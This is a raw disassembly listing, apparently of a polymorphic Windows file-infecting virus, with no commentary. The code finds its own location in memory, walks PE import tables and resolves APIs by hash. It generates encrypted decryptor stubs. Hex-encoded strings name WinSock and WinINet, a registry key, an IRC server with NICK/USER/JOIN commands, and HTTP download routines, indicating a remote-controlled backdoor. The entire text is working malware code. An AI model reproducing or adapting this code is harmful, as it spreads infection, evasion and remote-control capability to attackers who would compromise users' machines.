sub_31509C33 proc near ; CODE XREF: UPX2:31509CDA�p
; UPX2:31509CEB�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_31509C33 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_31509D16
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_31509D16
mov ecx, [ebp+401588h]
jecxz short loc_31509CCE
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31509CCE: ; CODE XREF: UPX2:31509CC0�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_31509C33
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_31509C33
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_31509C33
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_31509D16
lea ecx, [edi+23F5h]
call sub_31509C33
loc_31509D16: ; CODE XREF: UPX2:31509C80�j
; UPX2:31509CB8�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1A43ED81h, 0FF6A0040h, 1A0E958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 401A54h, 85C720CDh
dd 401A56h, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1A72B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 35F095FFh, 0C4830040h, 74958B0Ch, 2B004035h, 7EA83D7h
dd 6A07C7h, 578900E8h, 1A6AC303h, 9E858h, 428D0000h, 0C9FEAA61h
db 75h, 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_31509DFB proc near ; CODE XREF: sub_3150A666+1B�p
; sub_3150A7DE+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31509DFB endp
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401B09h, 364A9D8Bh, 7C830040h, 0F000824h
dd 0B984h, 8EC8100h, 54000002h, 10468h, 9095FF00h, 8B004035h
dd 24848DFCh, 104h, 0E8006A50h, 4, 545256h, 8C95FF57h
dd 33004035h, 4978DC9h, 51000001h, 51026A51h, 68016Ah
dd 52400000h, 355C95FFh, 85960040h, 505B74F6h, 1046854h
dd 0FF570000h, 22024B4h, 95FF0000h, 403628h, 74C08559h
dd 5014E316h, 6AD48Bh, 56575152h, 35CC95FFh, 85590040h
dd 56D075C0h, 353C95FFh, 578D0040h, 6A575244h, 978D5844h
dd 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h, 356495FFh
dd 0C4810040h, 208h, 82474FFh, 361895FFh, 0FF530040h, 40361895h
dd 4C25D00h, 0A3E8000h, 8B460175h, 4015848Dh, 8D19E300h
dd 40100095h, 56D10300h, 0C084D2FFh, 11F880Fh, 840F0000h
dd 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h, 0F175203Eh
dd 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h, 6A51CEh
dd 0FF535651h, 40361095h, 0C13B5900h, 0DF850Fh, 858D0000h
dd 401DA2h, 0C68006Ah, 50000000h, 1095FF53h, 3D004036h
dd 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh, 0A5850F56h
dd 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h, 0ACF37520h
dd 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h, 203CAC7Fh
dd 7E817C75h, 746820FFh, 81717574h, 3A70037Eh, 68752F2Fh
dd 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h, 4035BCh
dd 5050C033h, 9E85050h, 44000000h, 6C6E776Fh, 64616Fh
dd 362095FFh, 0C0850040h, 0C9333674h, 364A8589h, 68510040h
dd 80000200h, 50565151h, 362495FFh, 958D0040h, 401B03h
dd 54C93350h, 51525051h, 6C95FF51h, 87004035h, 95FF2404h
dd 40353Ch, 8D80C3F8h, 401577h, 53C3F901h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh, 75435C73h
dd 6E657272h, 72655674h, 6E6F6973h, 7078455Ch, 65726F6Ch
dd 61540072h, 74656772h, 74736F48h, 0FF000200h, 897255F0h
dd 6F72703Ch, 2E6D6978h, 67637269h, 78616C61h, 6C702E79h
dd 43494E00h, 6B6C204Bh, 7267757Ah, 550A6A77h, 20524553h
dd 30323070h, 20313035h, 202E202Eh, 4F4A2D3Ah, 26204E49h
dd 74726976h, 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401DB4h
mov byte ptr [ebp+401577h], 0
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz short loc_3150A115
push 1Eh
mov esi, [ebp+403550h]
pop ecx
loc_3150A0E2: ; CODE XREF: UPX2:loc_3150A111�j
lodsb
cmp al, 2Eh
jnz short loc_3150A111
cmp word ptr [esi], 1DFFh
jnz short loc_3150A111
lea edi, [ebp+403640h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_3150A111: ; CODE XREF: UPX2:3150A0E5�j
; UPX2:3150A0EC�j
loop loc_3150A0E2
jmp short loc_3150A158
; ---------------------------------------------------------------------------
loc_3150A115: ; CODE XREF: UPX2:3150A0D7�j
lea eax, [ebp+4015B1h]
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
jnz short loc_3150A158
call near ptr loc_3150A135+1
push ebx
inc esi
inc ebx
loc_3150A135: ; CODE XREF: UPX2:3150A12D�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 8895FF00h, 0E8004035h
dd 0FFFFFC31h
; ---------------------------------------------------------------------------
loc_3150A158: ; CODE XREF: UPX2:3150A113�j
; UPX2:3150A12B�j
call sub_315094B3
dec dword ptr [ebp+401303h]
call near ptr loc_3150A172+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3150A172: ; CODE XREF: UPX2:3150A163�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
db 0
dd 73770000h, 6E697270h, 416674h, 4895FF50h, 89004035h
dd 40355485h, 8D310F00h, 4018E08Dh, 46858900h, 51004036h
dd 359C95FFh, 68930040h, 4, 18EDB58Dh, 8D590040h, 40362CBDh
dd 0F6D6E800h, 0C766FFFFh, 401D6785h, 83F0FF00h, 401D69A5h
dd 958D0000h, 401D27h, 16A5450h, 6852006Ah, 80000002h
dd 363095FFh, 0C0850040h, 8D22755Ah, 401D5A8Dh, 66A5200h
dd 1D67B58Dh, 56540040h, 52515050h, 363495FFh, 0FF580040h
dd 40362C95h, 4D85C600h, 4038h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 9C95FF00h, 93004035h, 768h, 44B58D00h, 59004018h
dd 35FCBD8Dh, 51E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 359C95FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 1882B58Dh, 8D590040h, 403618BDh, 0F61AE800h, 0BD83FFFFh
dd 40361Ch, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
dd 4035FC95h, 90C48100h, 50000001h, 6AD48Bh, 1C95FF52h
dd 85004036h, 0D7559C0h, 138868h, 0BC95FF00h, 0EB004035h
dd 69BD83E2h, 401Dh, 858D2975h, 401D6Dh, 895FF50h, 85004036h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401D69h, 384D85C6h
dd 6A010040h, 6A016A00h, 1495FF02h, 83004036h, 840FFFF8h
dd 112h, 65958D93h, 6A00401Dh, 0FF535210h, 40360495h, 0FC08500h
dd 0F285h, 86BD8D00h, 0B100401Dh, 0FABCE808h, 9468FFFFh
dd 5E000000h, 3489E62Bh, 95FF5424h, 403598h, 1D94BD8Dh
dd 1B10040h, 0FFFA9DE8h, 24448BFFh, 8E0C110h, 424440Bh
dd 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h, 40355495h
dd 0CC48300h, 200647C6h, 1D81958Dh, 6A0040h, 2168h, 0FF535200h
dd 40361095h, 247C8D00h, 95FF5714h, 403558h, 0A3804C6h
dd 50006A40h, 95FF5357h, 403610h, 0BD8DE603h, 401DA2h
dd 0C68006Ah, 57000000h, 1095FF53h, 3D004036h, 0Ch, 0B58D4D75h
dd 40364Eh, 384D8D8Dh, 0CE2B0040h, 5651006Ah, 0C95FF53h
dd 83004036h, 2F7E00F8h, 8DFE8B91h, 40364EB5h, 0F20DB000h
dd 601075AEh, 0FFFAF8E8h, 177261FFh, 778D09E3h, 8BEAEB01h
dd 8DCE2BCFh, 40364EBDh, 87A4F300h, 53B9EBF7h, 360095FFh
dd 0BD800040h, 401577h, 682A7401h, 7530h, 35BC95FFh, 0BD800040h
dd 40384Dh, 0C7117400h, 401D6985h, 0
dd 4D85C600h, 4038h, 0FFFE56E9h, 8085C7FFh, 4015h, 5D800000h
dd 0D0004C2h, 6E204F0Ah, 206E6F6Fh, 6C20666Fh, 21656669h
dd 74204F20h, 20656D69h, 63206F74h, 62656C65h, 65746172h
dd 200A0D21h, 20202020h, 7573204Fh, 72656D6Dh, 72616720h
dd 216E6564h, 65520A0Dh, 746E656Ch, 7373656Ch, 6820796Ch
dd 79707061h, 646E6120h, 70786520h, 61746365h, 202C746Eh
dd 6E617473h, 676E6964h, 0D2D203Ah, 7461570Ah, 6E696863h
dd 6C612067h, 6164206Ch, 6E612079h, 696E2064h, 2C746867h
dd 726F6620h, 69726620h, 73646E65h, 77204920h, 3A746961h
dd 68570A0Dh, 20657265h, 20657261h, 2C756F79h, 69726620h
dd 73646E65h, 6F43203Fh, 2021656Dh, 69207449h, 69742073h
dd 2021656Dh, 73277449h, 74616C20h, 0A0D2165h, 30C78404h
dd 0C26CCC5Ch, 3AAB5957h, 4FD479EDh, 10A61429h, 4CA2A1A8h
dd 6299AD47h, 27B1FAE5h, 40375248h, 1A73C17Eh, 606EF96Ah
dd 10A61413h, 0D8B8B352h, 13h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3150A5B0 proc near ; CODE XREF: sub_3150A5F7:loc_3150A654�p
; sub_3150A6B7+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3150A5CC: ; CODE XREF: sub_3150A5B0+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3150A5EE
cmp eax, [edx+8]
jnb short loc_3150A5EE
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_3150A5F3
; ---------------------------------------------------------------------------
loc_3150A5EE: ; CODE XREF: sub_3150A5B0+23�j
; sub_3150A5B0+28�j
add edx, 28h
loop loc_3150A5CC
loc_3150A5F3: ; CODE XREF: sub_3150A5B0+3C�j
popa
retn 4
sub_3150A5B0 endp
; =============== S U B R O U T I N E =======================================
sub_3150A5F7 proc near ; CODE XREF: UPX2:3150A923�p
; UPX2:3150A949�p
mov [ebp+4022F7h], al
call sub_3150A666
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_3150A60E: ; CODE XREF: sub_3150A5F7+1E�j
cmp [eax], ebx
jz short loc_3150A61E
add eax, 4
loop loc_3150A60E
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3150A61E: ; CODE XREF: sub_3150A5F7+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_3150A638
loc_3150A628: ; CODE XREF: sub_3150A5F7+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3150A628
mov [ebp+402224h], ebx
loc_3150A638: ; CODE XREF: sub_3150A5F7+2F�j
; sub_3150A666+34�j
cmp dword ptr [edx], 0
jz short loc_3150A642
sub esi, [edx]
add esi, [edx+10h]
loc_3150A642: ; CODE XREF: sub_3150A5F7+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3150A651
push dword ptr [edx]
jmp short loc_3150A654
; ---------------------------------------------------------------------------
loc_3150A651: ; CODE XREF: sub_3150A5F7+54�j
push dword ptr [edx+10h]
loc_3150A654: ; CODE XREF: sub_3150A5F7+58�j
call sub_3150A5B0
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3150A5F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150A666 proc near ; CODE XREF: sub_3150A5F7+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3150A6B7
mov eax, [ebp+40398Eh]
call sub_31509DFB
call sub_3150A6A3
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3150A69C
mov [ebp+4022A0h], ebx
jmp short loc_3150A638
; ---------------------------------------------------------------------------
loc_3150A69C: ; CODE XREF: sub_3150A666+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3150A666 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150A6A3 proc near ; CODE XREF: sub_3150A666+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3150A6B7
xor ecx, ecx
retn
sub_3150A6A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150A6B7 proc near ; CODE XREF: sub_3150A666+10�p
; sub_3150A6A3+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3150A5B0
add edx, [ebp+4039AAh]
add edx, esi
loc_3150A6CB: ; CODE XREF: sub_3150A6B7+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3150A7DC
cmp dword ptr [edx+10h], 0
jz locret_3150A7DC
mov eax, [edx+0Ch]
push eax
call sub_3150A5B0
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3150A6F1: ; CODE XREF: sub_3150A6B7+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3150A711
cmp cl, 2Eh
jz short loc_3150A700
loc_3150A6FD: ; CODE XREF: sub_3150A6B7+58�j
inc eax
jmp short loc_3150A6F1
; ---------------------------------------------------------------------------
loc_3150A700: ; CODE XREF: sub_3150A6B7+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3150A6FD
loc_3150A711: ; CODE XREF: sub_3150A6B7+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3150A7D4
cmp word ptr [eax-2], 3233h
jnz loc_3150A7D4
push esi
cmp dword ptr [edx], 0
jnz short loc_3150A734
mov ecx, [edx+10h]
jmp short loc_3150A736
; ---------------------------------------------------------------------------
loc_3150A734: ; CODE XREF: sub_3150A6B7+76�j
mov ecx, [edx]
loc_3150A736: ; CODE XREF: sub_3150A6B7+7B�j
add esi, ecx
push ecx
call sub_3150A5B0
add esi, [ebp+4039AAh]
loc_3150A744: ; CODE XREF: sub_3150A6B7+90�j
; sub_3150A6B7+117�j
lodsd
test eax, eax
js short loc_3150A744
jz loc_3150A7D3
push dword ptr [ebp+4039AAh]
push eax
call sub_3150A5B0
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3150A770: ; CODE XREF: sub_3150A6B7+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3150A787
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3150A770
; ---------------------------------------------------------------------------
loc_3150A787: ; CODE XREF: sub_3150A6B7+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3150A7CD
cmp ebx, 0DB6E45A8h
jz short loc_3150A7CD
cmp ebx, 0FFA13B59h
jz short loc_3150A7CD
cmp ebx, 0ACB522D6h
jz short loc_3150A7CD
cmp ebx, 0F358E993h
jz short loc_3150A7CD
cmp ebx, 0F358E97Dh
jz short loc_3150A7CD
cmp ebx, 0E1253F46h
jz short loc_3150A7CD
cmp ebx, 0E1253F30h
jz short loc_3150A7CD
call dword ptr [ebp+403992h]
loc_3150A7CD: ; CODE XREF: sub_3150A6B7+D6�j
; sub_3150A6B7+DE�j ...
pop ebx
jmp loc_3150A744
; ---------------------------------------------------------------------------
loc_3150A7D3: ; CODE XREF: sub_3150A6B7+92�j
pop esi
loc_3150A7D4: ; CODE XREF: sub_3150A6B7+60�j
; sub_3150A6B7+6C�j
add edx, 14h
jmp loc_3150A6CB
; ---------------------------------------------------------------------------
locret_3150A7DC: ; CODE XREF: sub_3150A6B7+18�j
; sub_3150A6B7+22�j
retn
sub_3150A6B7 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_3150A7DE proc near ; CODE XREF: UPX2:3150A91C�p
; UPX2:3150A942�p
push 4
pop eax
call sub_31509DFB
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31509DFB
add edx, 8
xchg edx, ecx
loc_3150A806: ; CODE XREF: sub_3150A7DE:loc_3150A845�j
push 5
pop eax
call sub_31509DFB
cmp dl, 3
jnb short loc_3150A81E
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_3150A845
; ---------------------------------------------------------------------------
loc_3150A81E: ; CODE XREF: sub_3150A7DE+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_3150A83F
mov al, 11h
call sub_31509DFB
mov eax, 1
loc_3150A833: ; CODE XREF: sub_3150A7DE+5D�j
test dl, dl
jz short loc_3150A844
shl eax, 1
dec dl
jmp short loc_3150A833
; ---------------------------------------------------------------------------
jmp short loc_3150A844
; ---------------------------------------------------------------------------
loc_3150A83F: ; CODE XREF: sub_3150A7DE+47�j
mov eax, 80000000h
loc_3150A844: ; CODE XREF: sub_3150A7DE+57�j
; sub_3150A7DE+5F�j
stosd
loc_3150A845: ; CODE XREF: sub_3150A7DE+3E�j
loop loc_3150A806
retn
sub_3150A7DE endp
; ---------------------------------------------------------------------------
loc_3150A848: ; CODE XREF: sub_3150B2A2+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150A85D
mov al, 60h
stosb
loc_3150A85D: ; CODE XREF: UPX2:3150A858�j
test dword ptr [ebp+403431h], 1000003h
jz loc_3150A963
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EEDA5421h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3150A8DB
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_3150A8A6
mov eax, 2E8B6467h
loc_3150A8A6: ; CODE XREF: UPX2:3150A89F�j
stosd
mov ax, 0
stosw
jz short loc_3150A8B2
mov al, 5Dh
stosb
loc_3150A8B2: ; CODE XREF: UPX2:3150A8AD�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3150A8D9
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3150A8D9
mov eax, 0F8ED83h
loc_3150A8D9: ; CODE XREF: UPX2:3150A8C1�j
; UPX2:3150A8D2�j
stosd
dec edi
loc_3150A8DB: ; CODE XREF: UPX2:3150A88E�j
test dword ptr [ebp+403431h], 3
jz short loc_3150A8EB
mov al, 0E9h
stosb
stosd
loc_3150A8EB: ; CODE XREF: UPX2:3150A8E5�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_3150A963
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3150A7DE
mov al, 20h
call sub_3150A5F7
jecxz short loc_3150A963
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_3150A956
call sub_3150A7DE
mov al, 1Fh
call sub_3150A5F7
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_3150A956: ; CODE XREF: UPX2:3150A940�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_3150A963: ; CODE XREF: UPX2:3150A867�j
; UPX2:3150A902�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3150A981
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3150A981: ; CODE XREF: UPX2:3150A96D�j
test dword ptr [ebp+403431h], 8
jnz short loc_3150A9D7
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3150A9D7
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_3150A9D5
mov al, 49h
stosb
mov ax, 0FC75h
loc_3150A9D5: ; CODE XREF: UPX2:3150A9CC�j
stosw
loc_3150A9D7: ; CODE XREF: UPX2:3150A98B�j
; UPX2:3150A994�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3150A9F8
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3150A9F8: ; CODE XREF: UPX2:3150A9ED�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3150AA0B
add ah, 28h
loc_3150AA0B: ; CODE XREF: UPX2:3150AA06�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_3150AA2F
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3150AA2F: ; CODE XREF: UPX2:3150AA24�j
test dword ptr [ebp+403431h], 80h
jnz short loc_3150AA46
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_3150AA83
; ---------------------------------------------------------------------------
loc_3150AA46: ; CODE XREF: UPX2:3150AA39�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_3150AA58
mov al, 29h
loc_3150AA58: ; CODE XREF: UPX2:3150AA54�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_3150AA7B
mov ah, 0C8h
loc_3150AA7B: ; CODE XREF: UPX2:3150AA77�j
or ah, [ebp+40342Ah]
stosw
loc_3150AA83: ; CODE XREF: UPX2:3150AA44�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_3150AB07
test dword ptr [ebp+403431h], 400h
jnz short loc_3150AAB2
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_3150AAFF
; ---------------------------------------------------------------------------
loc_3150AAB2: ; CODE XREF: UPX2:3150AAA5�j
test dword ptr [ebp+403431h], 800h
jnz short loc_3150AACF
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_3150AAE4
; ---------------------------------------------------------------------------
loc_3150AACF: ; CODE XREF: UPX2:3150AABC�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_3150AAE4: ; CODE XREF: UPX2:3150AACD�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_3150AAF7
add ah, 8
loc_3150AAF7: ; CODE XREF: UPX2:3150AAF2�j
or ah, [ebp+40342Bh]
stosw
loc_3150AAFF: ; CODE XREF: UPX2:3150AAB0�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_3150AB07: ; CODE XREF: UPX2:3150AA99�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_3150AB1C
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3150AB1C: ; CODE XREF: UPX2:3150AB11�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_3150AB2C
add al, 4
loc_3150AB2C: ; CODE XREF: UPX2:3150AB28�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_3150AB49
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150AB49: ; CODE XREF: UPX2:3150AB40�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_3150AB5B
mov ah, 29h
loc_3150AB5B: ; CODE XREF: UPX2:3150AB57�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_3150AB79
mov al, 86h
loc_3150AB79: ; CODE XREF: UPX2:3150AB75�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_3150AB8D
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150AB8D: ; CODE XREF: UPX2:3150AB84�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_3150ABA4
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_3150ABB3
; ---------------------------------------------------------------------------
loc_3150ABA4: ; CODE XREF: UPX2:3150AB97�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_3150ABB3: ; CODE XREF: UPX2:3150ABA2�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_3150ABEE
test dword ptr [ebp+403431h], 40000h
jnz short loc_3150ABE5
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3150ABED
; ---------------------------------------------------------------------------
loc_3150ABE5: ; CODE XREF: UPX2:3150ABC9�j
mov al, 40h
or al, [ebp+40342Bh]
loc_3150ABED: ; CODE XREF: UPX2:3150ABE3�j
stosb
loc_3150ABEE: ; CODE XREF: UPX2:3150ABBD�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_3150AC0A
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_3150AC12
; ---------------------------------------------------------------------------
loc_3150AC0A: ; CODE XREF: UPX2:3150ABF8�j
mov al, 48h
or al, [ebp+40342Ah]
loc_3150AC12: ; CODE XREF: UPX2:3150AC08�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_3150AC46
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_3150AC61
mov cl, 77h
jmp short loc_3150AC61
; ---------------------------------------------------------------------------
loc_3150AC46: ; CODE XREF: UPX2:3150AC1F�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_3150AC61: ; CODE XREF: UPX2:3150AC40�j
; UPX2:3150AC44�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_3150AD0B
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3150ACA2
mov eax, 2E876467h
loc_3150ACA2: ; CODE XREF: UPX2:3150AC9B�j
stosd
mov eax, 0
stosw
jnz short loc_3150ACB2
mov ax, 0E58Bh
stosw
loc_3150ACB2: ; CODE XREF: UPX2:3150ACAA�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_3150AD08
test dword ptr [ebp+403431h], 8000000h
jz short loc_3150ACFA
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
